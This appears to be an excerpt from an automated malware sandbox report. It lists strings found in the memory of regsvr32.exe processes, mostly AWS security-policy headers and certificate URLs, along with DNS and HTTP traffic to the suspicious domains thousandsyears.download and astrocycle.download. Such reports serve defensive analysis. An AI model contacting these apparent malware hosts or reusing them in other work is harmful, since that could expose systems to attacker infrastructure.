        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: .awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://sslOz equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
        Source: regsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-Idcj6kWJATGVaRS6cLhRSi4YOg3P7Y7NWCZgSKUGsKMvLB0-w177VmJQ==X-Amz-Cf-PopZRH50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-Idcj6kWJATGVaRS6cLhRSi4YOg3P7Y7NWCZgSKUGsKMvLB0-w177VmJQ==X-Amz-Cf-PopZRH50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: bsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https:/ equals www.linkedin.com (Linkedin)
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
        Source: regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
        Source: regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpString found in binary or memory: front.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https8z equals www.linkedin.com (Linkedin)
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: unknownDNS traffic detected: queries for: thousandsyears.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 13:07:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=GN9wYO%2BIuHVeDE2EWDQTg%2BEKZY5Nl%2Fwc0vzEgt9k98rnRs6rIHEnNd7r%2F6bXYCKHxUmoJyoC1IQCkvi71zSQPkur0%2F%2BM4ztJ8f9a4JHQ6lws%2Fs6%2B%2Br%2FebSEod2C%2FoFGRjQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a90e5fff624a61-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2116860376.00000000004B3000.00000004.00000020.sdmpString found in binary or memory: http://astrocycle.download/
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106538777.00000000003EC000.00000004.00000001.sdmpString found in binary or memory: http://crl.sca1b.amazontrus
        Source: regsvr32.exe, 00000004.00000003.2106538777.00000000003EC000.00000004.00000001.sdmpString found in binary or memory: http://crl.sca1b.amazontrusP
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
        Source: regsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
        Source: regsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
        Source: regsvr32.exe, 00000003.00000002.2103699251.0000000003397000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: regsvr32.exe, 00000003.00000002.2103699251.0000000003397000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpString found in binary or memory: http://o.ss2.us/0
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
